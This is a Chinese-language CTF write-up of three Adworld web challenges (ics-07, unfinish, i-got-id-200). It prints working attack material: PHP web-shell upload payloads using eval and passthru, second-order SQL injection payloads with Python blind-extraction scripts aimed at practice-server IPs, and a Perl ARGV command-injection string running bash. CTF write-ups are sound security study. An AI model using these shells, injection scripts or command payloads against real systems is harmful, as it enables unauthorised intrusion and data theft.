攻防世界6分题目wp

落日映苍穹つ 2022-12-15 14:16 167阅读 0赞

# 攻防世界6分题目wp #

## 一.ics-07 ##

①利用一句话木马思路  
题目提示–>存在解析漏洞(即典型)  
考虑为构造payload的题目  
然后根据提示来到页面处  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzMzOTQyMDQw_size_16_color_FFFFFF_t_70_pic_center]  
查看源码

<html>
      <head>
        <meta charset="utf-8">
        <title>cetc7</title>
      </head>
      <body>
        <?php
        session_start();
    
        if (!isset($_GET[page])) { 
          show_source(__FILE__);
          die();
        }
    
        if (isset($_GET[page]) && $_GET[page] != 'index.php') { 
          include('flag.php');
        }else { 
          header('Location: ?page=flag.php');
        }
    
        ?>
    
        <form action="#" method="get">
          page : <input type="text" name="page" value="">
          id : <input type="text" name="id" value="">
          <input type="submit" name="submit" value="submit">
        </form>
        <br />
        <a href="index.phps">view-source</a>
    
        <?php
         if ($_SESSION['admin']) { 
           $con = $_POST['con'];
           $file = $_POST['file'];
           $filename = "backup/".$file;
    
           if(preg_match('/.+\.ph(p[3457]?|t|tml)$/i', $filename)){ 
              die("Bad file extension");
           }else{ 
                chdir('uploaded');
               $f = fopen($filename, 'w');
               fwrite($f, $con);
               fclose($f);
           }
         }
         ?>
    
        <?php
          if (isset($_GET[id]) && floatval($_GET[id]) !== '1' && substr($_GET[id], -1) === '9') { 
            include 'config.php';
            $id = mysql_real_escape_string($_GET[id]);
            $sql="select * from cetc007.user where id='$id'";
            $result = mysql_query($sql);
            $result = mysql_fetch_object($result);
          } else { 
            $result = False;
            die();
          }
    
          if(!$result)die("<br >something wae wrong ! <br>");
          if($result){ 
            echo "id: ".$result->id."</br>";
            echo "name:".$result->user."</br>";
            $_SESSION['admin'] = True;
          }
         ?>
    
      </body>
    </html>

分析后需要条件为

> > isset(KaTeX parse error: Expected 'EOF', got '&' at position 11: \_GET\[id\]) &̲& floatval(\_GET\[id\]) !== ‘1’ && substr($\_GET\[id\], -1) === ‘9’  
> > $\_SESSION\[‘admin’\]==true

因此构造payload  
GET请求的payload

index.php?page=flag.php&id=1-9

POST的payload

file=2.php/.&con=<?php @eval($_POST[apple])?>#写马入2.php文件下
    #或者
    con=<?php @eval($_POST['admin']);?>&file=../flag.php/.&Submit%21=Submit%21
    #也可进行写马
    file=2.php/.&con=<?php phpinfo();?>#查看phpinfo()页面

连接一句话木马

ip/uploaded/backup/2.php

即获取flag  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzMzOTQyMDQw_size_16_color_FFFFFF_t_70_pic_center 1]  
②利用cat文件思路  
构建exp

file=../123.php/1.php/..&con=<?php passthru($_GET[bash]);?>

–>利用的是bash方式进行传值  
然后利用bash读取即可

uploaded/123.php?bash=cat ../flag.php

## 二.unfinish（二次注入） ##

①进入网站发现是login页面  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzMzOTQyMDQw_size_16_color_FFFFFF_t_70_pic_center 2]  
因为题目提示是sql注入–>做了一些基础的测试  
把sql的字符全跑了一遍和四类注入  
发觉全爆的是用户或者密码错误  
于是考虑注入点不在这里  
于是打开了我心爱的AWVS  
扫描后发觉  
存在一个register且在username处存在注入点  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzMzOTQyMDQw_size_16_color_FFFFFF_t_70_pic_center 3]  
推测这里的注册SQL语句是

insert into tables value('$email','$username','$passwpord');

于是进行对该处的username进行模糊测试  
发觉典型的模糊测试包  
只有两个没被过滤  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzMzOTQyMDQw_size_16_color_FFFFFF_t_70_pic_center 4]

进行尝试绕  
1.尝试利用group\_concat()语句进行闭合代返回database()

group_concat(1,database()),database','1')#

发觉被过滤掉了  
2.尝试利用and运算进行绕

1' and ' 0

3.insert注入

select ‘1’+‘1a’;#select ‘1’+‘1a’;-->结果2
    select '0'+database();#-->
     
    select '0'+ascii(substr(database(),1,1));#-->截取后进行ascii编码,会出现逗号被过滤
    #即--> substr(str from 1 for 10) （表示截取str字符串的第1个到第10个字符）
    select '0'+ascii(substr(database() from 1 for 1));#-->因此利用from ...for...进行替换,

> > 典型替换  
> > from 1 for 1 替换,  
> > \+替换–>空格 如and+1=1

4.形成payload

username=0'+(select substr(hex(hex((select * from flag))) from 1 for 10))+'0

原因：①使用前一个0’±->的原因控制闭合  
后一个+'0是因为想控制显示精度状况–>即如果只用hex会导致查询不出来的状况特点  
②使用两次hex()原因–>防止丢失字母的原因且使用hex是将database()转换为16进制–>实现绕掉过滤掉防止database()的状况

大佬脚本

import requests
    import time
    from bs4 import BeautifulSoup       #html解析器
    
    def getDatabase():
        database = ''
        for i in range(10):
            data_database = { 
                'username':"0'+ascii(substr((select database()) from "+str(i+1)+" for 1))+'0",
                'password':'admin',
                "email":"admin11@admin.com"+str(i)
            }
            #注册
            requests.post("http://220.249.52.133:57046/register.php",data_database)
            login_data={ 
                'password':'admin',
                "email":"admin11@admin.com"+str(i)
            }
            response=requests.post("http://220.249.52.133:57046/login.php",login_data)
            html=response.text                  #返回的页面
            soup=BeautifulSoup(html,'html.parser')
            getUsername=soup.find_all('span')[0]#获取用户名
            username=getUsername.text
            if int(username)==0:
                break
            database+=chr(int(username))
        return database
    
    print(getDatabase())
    
    
    def getTables():
        tables = ''
        for i in range(10):
            data_tables = { 
                'username':"0'+ascii(substr((select tables()) from "+str(i+1)+" for 1))+'0",
                'password':'admin',
                "email":"admin12@admin.com"+str(i)
            }
            #注册
            requests.post("http://220.249.52.133:57046/register.php",data_tables)
            login_data={ 
                'password':'admin',
                "email":"admin12@admin.com"+str(i)
            }
            response=requests.post("http://220.249.52.133:57046/login.php",login_data)
            html=response.text                  #返回的页面
            soup=BeautifulSoup(html,'html.parser')
            getUsername=soup.find_all('span')[0]#获取用户名
            username=getUsername.text
            if int(username)==0:
                break
            tables+=chr(int(username))
        return tables
    ''' print(getTables()) '''
    
    def getFlag():
        flag = ''
        for i in range(40):
            data_flag = { 
                'username':"0'+ascii(substr((select * from flag) from "+str(i+1)+" for 1))+'0",
                'password':'admin',
                "email":"admin32@admin.com"+str(i)
            }
            #注册
            requests.post("http://220.249.52.133:57046/register.php",data_flag)
            login_data={ 
                'password':'admin',
                "email":"admin32@admin.com"+str(i)
            }
            response=requests.post("http://220.249.52.133:57046/login.php",login_data)
            html=response.text                  #返回的页面
            soup=BeautifulSoup(html,'html.parser')
            getUsername=soup.find_all('span')[0]#获取用户名
            username=getUsername.text
            if int(username)==0:
                break
            flag+=chr(int(username))
        return flag
    
    print(getFlag())

直接猜测flag在flag字段中写法

import requests
    import re
    
    
    register_url = 'http://220.249.52.133:40821/register.php'
    login_url = 'http://220.249.52.133:40821/login.php'
    
    
    for i in range(1, 100):
        register_data = { 
            'email': '111@123.com%d' % i,
            'username': "0' + ascii(substr((select * from flag) from %d for 1)) + '0" % i,
            'password': 'admin'
        }
        res = requests.post(url=register_url, data=register_data)
    
        login_data = { 
            'email': '111@123.com%d' % i,
            'password': 'admin'
        }
        res_ = requests.post(url=login_url, data=login_data)
        code = re.search(r'<span class="user-name">\s*(\d*)\s*</span>', res_.text)
        print(chr(int(code.group(1))), end='')

总结:

## 三，i-got-id-200 ##

考点：  
①对ARGV文件的利用  
②param()函数–>利用  
即传入一个ARGV文件–>则Perl会将传入的参数作为文件名传出

解题  
①进入网站后发觉可上传文件，于是上传一句话木马  
发觉被显示在了网页源码中  
![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzMzOTQyMDQw_size_16_color_FFFFFF_t_70_pic_center 5][]  
于是  
猜测网站的模式

```perl use strict; use warnings; use CGI;
    my $cgi= CGI->new; 
    if ( $cgi->upload( 'file' ) ) 
    {  my $file= $cgi->param( 'file' ); 
    while ( <$file> ) 
    {  print "$_"; 
    } }

即考虑利用ARGV文件,从而实现perl将参数当作文件名读取的效果  
利用方法–>构造ARVG文件流头  
进行实现表示是文件形式的含义  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzMzOTQyMDQw_size_16_color_FFFFFF_t_70_pic_center 6]  
利用方法–>读取文件目录的payload

?/bin/bash%20-c%20ls${IFS}/|
    #-->即该命令
    ?/bin/bash -c ls${IFS}/|
    #即通过管道的模式进行执行命令后将输出结果传输到读入流中

读取文件–>

/flag即可

[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzMzOTQyMDQw_size_16_color_FFFFFF_t_70_pic_center]: /images/20221123/33e06a1f54e34d6f89b628879a868492.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzMzOTQyMDQw_size_16_color_FFFFFF_t_70_pic_center 1]: /images/20221123/221d9ddf7d244b94b0d593a2aac11dd3.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzMzOTQyMDQw_size_16_color_FFFFFF_t_70_pic_center 2]: /images/20221123/bdfca7561ac64ed683c6ac908622f3fc.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzMzOTQyMDQw_size_16_color_FFFFFF_t_70_pic_center 3]: /images/20221123/1f7cee7b344d468e8c27dcab38b20157.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzMzOTQyMDQw_size_16_color_FFFFFF_t_70_pic_center 4]: /images/20221123/e5064eff4e074b3a99284df0a9bd56db.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzMzOTQyMDQw_size_16_color_FFFFFF_t_70_pic_center 5]: /images/20221123/3b49c7c394884009af2fd66790ea9516.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzMzOTQyMDQw_size_16_color_FFFFFF_t_70_pic_center 6]: /images/20221123/46af23f5d2fa4c9cb2ce48437c2ad880.png